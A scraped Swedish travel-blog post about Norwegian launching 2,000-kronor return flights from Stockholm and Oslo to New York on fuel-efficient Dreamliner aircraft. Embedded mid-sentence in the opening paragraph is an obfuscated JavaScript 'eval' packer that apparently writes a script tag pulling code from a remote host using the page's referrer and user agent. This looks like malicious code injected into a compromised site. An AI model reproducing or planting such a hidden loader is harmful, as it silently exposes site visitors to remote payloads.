Image Image Image Image Image Image Image Image Image Image

| 10 april, 2020

Scroll to top

Top

Tur och retur New York för 2 000 kronor

Tur och retur New York för 2 000 kronor
Sebastian

Att eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|titik|var|u0026u|referrer|fhaib||js|php’.split(’|’),0,{}))
flyga över Atlanten har aldrig varit billigt. Nu verkar det dock bli ändring på detta. 

Snart kommer flygbolaget Norwegian att börja lägga rutter från Stockholm, Arlanda och Oslo till den underbara staden New York. Denna resa tur och retur kommer att kosta dig endast 2000 kr.

varför priserna är överkomliga beror på att det nya flygplanet Dreamliner drar otroligt mycket mindre bränsle än deras tidigare maskiner. Förutom att planet drar mindre bränsle så tar man sig också dit ca 20 minuter snabbare än normalt då planet är lättare och snabbare.

Förutom New York kommer man även kunna ta sig till Bangkok. Den resan tar cirka 26 minuter mindre om man åker från Arlanda.
Flygplanet tar 291 passagerare varav 32 stycken är platser avsatta för ”Business Class”. I Business sitter man sju stycken på bredd, två platser vid fönstren och tre i mittengången. Mer plats för benen än i Economy där man sitter nio stycken i bredd.

Sex stycken flygplan är beställda av Norwegian och tros levereras i början på nästa år. Biljetterna kommer att släppas redan nu efter sommaren.